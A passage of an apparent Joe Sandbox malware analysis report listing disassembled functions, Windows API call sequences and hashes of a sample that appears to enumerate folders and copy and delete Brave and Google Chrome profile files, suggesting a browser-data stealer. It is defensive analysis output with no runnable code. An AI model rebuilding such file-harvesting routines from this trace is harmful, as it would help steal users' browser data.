                          • Part of subcall function 00464040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0046406D
                          • Part of subcall function 00464040: lstrcpy.KERNEL32(00000000,?), ref: 004640A2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004419C3
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441A0E
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441A16
                        • lstrlen.KERNEL32(00471794), ref: 00441A21
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441A41
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441A4D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441A76
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441A81
                        • lstrlen.KERNEL32(00471794), ref: 00441A8C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441AAC
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441AB8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441ADE
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441AE9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441B11
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00441B45
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 00441B70
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 00441B8A
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00441BC4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441BFB
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441C03
                        • lstrlen.KERNEL32(00471794), ref: 00441C0E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441C31
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441C3D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441C69
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441C74
                        • lstrlen.KERNEL32(00471794), ref: 00441C7F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441CA2
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441CAE
                        • lstrlen.KERNEL32(?), ref: 00441CBB
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441CDB
                        • lstrcat.KERNEL32(00000000,?), ref: 00441CE9
                        • lstrlen.KERNEL32(00471794), ref: 00441CF4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441D14
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441D20
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441D46
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441D51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441D7D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441DE0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441DEB
                        • lstrlen.KERNEL32(00471794), ref: 00441DF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441E19
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441E25
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441E4B
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441E56
                        • lstrlen.KERNEL32(00471794), ref: 00441E61
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441E81
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441E8D
                        • lstrlen.KERNEL32(?), ref: 00441E9A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441EBA
                        • lstrcat.KERNEL32(00000000,?), ref: 00441EC8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441EF4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441F3E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 00441F45
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00441F9F
                        • lstrlen.KERNEL32(015892A8), ref: 00441FAE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441FDB
                        • lstrcat.KERNEL32(00000000,?), ref: 00441FE3
                        • lstrlen.KERNEL32(00471794), ref: 00441FEE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044200E
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044201A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00442042
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044204D
                        • lstrlen.KERNEL32(00471794), ref: 00442058
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00442075
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00442081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                        • String ID: \*.*
                        • API String ID: 4127656590-1173974218
                        • Opcode ID: 7cc8ac31e2cac169de00997c63051488748b7aee53f0181903b29850c3b18f27
                        • Instruction ID: 8d0e8d71faaf48132f28d58f759df181d11c47ae699e3540274cedf9ca7818fc
                        • Opcode Fuzzy Hash: 7cc8ac31e2cac169de00997c63051488748b7aee53f0181903b29850c3b18f27
                        • Instruction Fuzzy Hash: C492B971A112169BEB21EF75DD89AAF77B9AF04304F44402AF809A7321DB78DD41CBA4
                        Function 0044DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DBC1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DBE4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DBEF
                        • lstrlen.KERNEL32(00474CA8), ref: 0044DBFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DC17
                        • lstrcat.KERNEL32(00000000,00474CA8), ref: 0044DC23
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DC4C
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DC8F
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DCBF
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0044DCD0
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0044DCF0
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 0044DD0A
                        • lstrlen.KERNEL32(0046CFEC), ref: 0044DD1D
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DD47
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DD70
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DD7B
                        • lstrlen.KERNEL32(00471794), ref: 0044DD86
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DDA3
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DDAF
                        • lstrlen.KERNEL32(?), ref: 0044DDBC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DDDF
                        • lstrcat.KERNEL32(00000000,?), ref: 0044DDED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DE19
                        • lstrlen.KERNEL32(00471794), ref: 0044DE3D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044DE6F
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DE7B
                        • lstrlen.KERNEL32(01588F48), ref: 0044DE8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DEB0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DEBB
                        • lstrlen.KERNEL32(00471794), ref: 0044DEC6
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044DEE6
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DEF2
                        • lstrlen.KERNEL32(015891C8), ref: 0044DF01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DF27
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DF32
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DF5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DFA5
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DFB1
                        • lstrlen.KERNEL32(01588F48), ref: 0044DFC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DFE9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DFF4
                        • lstrlen.KERNEL32(00471794), ref: 0044DFFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E022
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044E02E
                        • lstrlen.KERNEL32(015891C8), ref: 0044E03D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E063
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044E06E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E09A
                        • StrCmpCA.SHLWAPI(?,Brave), ref: 0044E0CD
                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0044E0E7
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044E11F
                        • lstrlen.KERNEL32(0158D250), ref: 0044E12E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E155
                        • lstrcat.KERNEL32(00000000,?), ref: 0044E15D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E19F
                        • lstrcat.KERNEL32(00000000), ref: 0044E1A9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E1D0
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0044E1F9
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044E22F
                        • lstrlen.KERNEL32(015892A8), ref: 0044E23D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E261
                        • lstrcat.KERNEL32(00000000,015892A8), ref: 0044E269
                        • lstrlen.KERNEL32(\Brave\Preferences), ref: 0044E274
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E29B
                        • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0044E2A7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E2CF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E30F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E349
                        • DeleteFileA.KERNEL32(?), ref: 0044E381
                        • StrCmpCA.SHLWAPI(?,0158D490), ref: 0044E3AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E3F4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E41C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E445
                        • StrCmpCA.SHLWAPI(?,015891C8), ref: 0044E468
                        • StrCmpCA.SHLWAPI(?,01588F48), ref: 0044E47D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E4D9
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0044E4E0
                        • StrCmpCA.SHLWAPI(?,0158D2B0), ref: 0044E58E
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044E5C4
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0044E639
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E678
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E6A1
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E6C7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E70E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E737
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E75C
                        • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0044E776
                        • DeleteFileA.KERNEL32(?), ref: 0044E7D2
                        • StrCmpCA.SHLWAPI(?,01589298), ref: 0044E7FC
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E88C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E8B5
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E8EE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E916
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E952
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 2635522530-726946144
                        • Opcode ID: 9758ccd3784f37b27e8d541b2e8e1d233ddbfb0b2d76ecf9ff9cc099027c2621
                        • Instruction ID: 909aa127c2850f748a7abca37908e84536898dbc86ed4e15249c2a66916eb9ff
                        • Opcode Fuzzy Hash: 9758ccd3784f37b27e8d541b2e8e1d233ddbfb0b2d76ecf9ff9cc099027c2621
                        • Instruction Fuzzy Hash: 0992B071A10206AFEB24EF75DD89AAF77B9BF44304F44412AF809A7350DB78DC458BA4
                        Function 004518A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004518D2
                        • lstrlen.KERNEL32(\*.*), ref: 004518DD
                        • lstrcpy.KERNEL32(00000000,?), ref: 004518FF
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 0045190B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451932
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00451947
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 00451967
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 00451981
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004519BF
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004519F2
                        • lstrcpy.KERNEL32(00000000,?), ref: 00451A1A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00451A25
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451A4C
                        • lstrlen.KERNEL32(00471794), ref: 00451A5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451A80
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451A8C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451AB4
                        • lstrlen.KERNEL32(?), ref: 00451AC8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451AE5
                        • lstrcat.KERNEL32(00000000,?), ref: 00451AF3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451B19
                        • lstrlen.KERNEL32(01589128), ref: 00451B2F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451B59
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00451B64
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451B8F
                        • lstrlen.KERNEL32(00471794), ref: 00451BA1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451BC3
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451BCF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451BF8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451C25
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00451C30
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451C57
                        • lstrlen.KERNEL32(00471794), ref: 00451C69
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451C8B
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451C97
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451CC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451CEF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00451CFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451D21
                        • lstrlen.KERNEL32(00471794), ref: 00451D33
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451D55
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451D61
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451D8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451DB9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00451DC4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451DED
                        • lstrlen.KERNEL32(00471794), ref: 00451E19
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451E36
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451E42
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451E68
                        • lstrlen.KERNEL32(0158D4D8), ref: 00451E7E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451EB2
                        • lstrlen.KERNEL32(00471794), ref: 00451EC6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451EE3
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451EEF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451F15
                        • lstrlen.KERNEL32(0158D7F0), ref: 00451F2B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451F5F
                        • lstrlen.KERNEL32(00471794), ref: 00451F73
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451F90
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451F9C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451FC2
                        • lstrlen.KERNEL32(0157B978), ref: 00451FD8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00452000
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045200B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00452036
                        • lstrlen.KERNEL32(00471794), ref: 00452048
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00452067
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00452073
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00452098
                        • lstrlen.KERNEL32(?), ref: 004520AC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004520D0
                        • lstrcat.KERNEL32(00000000,?), ref: 004520DE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00452103
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045213F
                        • lstrlen.KERNEL32(0158D250), ref: 0045214E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00452176
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00452181
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                        • String ID: \*.*
                        • API String ID: 712834838-1173974218
                        • Opcode ID: 343279962de592b267ffdca21b160520903b186efda82014b6f0fc2d4833a66d
                        • Instruction ID: e541aa4871e13cc33f7360a0844c78aebc3499a414dc296ef87ecf9f9f4e5b9b
                        • Opcode Fuzzy Hash: 343279962de592b267ffdca21b160520903b186efda82014b6f0fc2d4833a66d
                        • Instruction Fuzzy Hash: EF62B6306116169BDB25AF74CD48AAFB6BAAF44705F44002AFC05A3362DB7CDD45CBA8
                        Function 00453910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0045392C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00453943
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045396C
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 00453986
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004539BF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004539E7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004539F2
                        • lstrlen.KERNEL32(00471794), ref: 004539FD
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453A1A
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00453A26
                        • lstrlen.KERNEL32(?), ref: 00453A33
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453A53
                        • lstrcat.KERNEL32(00000000,?), ref: 00453A61
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453A8A
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00453ACE
                        • lstrlen.KERNEL32(?), ref: 00453AD8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453B05
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00453B10
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453B36
                        • lstrlen.KERNEL32(00471794), ref: 00453B48
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453B6A
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00453B76
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453B9E
                        • lstrlen.KERNEL32(?), ref: 00453BB2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453BD2
                        • lstrcat.KERNEL32(00000000,?), ref: 00453BE0
                        • lstrlen.KERNEL32(015892A8), ref: 00453C0B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453C31
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00453C3C
                        • lstrlen.KERNEL32(01589128), ref: 00453C5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453C84
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00453C8F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453CB7
                        • lstrlen.KERNEL32(00471794), ref: 00453CC9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453CE8
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00453CF4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453D1A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00453D47
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00453D52
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453D79
                        • lstrlen.KERNEL32(00471794), ref: 00453D8B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453DAD
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00453DB9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453DE2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453E11
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00453E1C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453E43
                        • lstrlen.KERNEL32(00471794), ref: 00453E55
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453E77
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00453E83
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453EAC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453EDB
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00453EE6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453F0D
                        • lstrlen.KERNEL32(00471794), ref: 00453F1F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453F41
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00453F4D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453F75
                        • lstrlen.KERNEL32(?), ref: 00453F89
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453FA9
                        • lstrcat.KERNEL32(00000000,?), ref: 00453FB7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00453FE0
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045401F
                        • lstrlen.KERNEL32(0158D250), ref: 0045402E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454056
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00454061
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045408A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004540CE
                        • lstrcat.KERNEL32(00000000), ref: 004540DB
                        • FindNextFileA.KERNEL32(00000000,?), ref: 004542D9
                        • FindClose.KERNEL32(00000000), ref: 004542E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
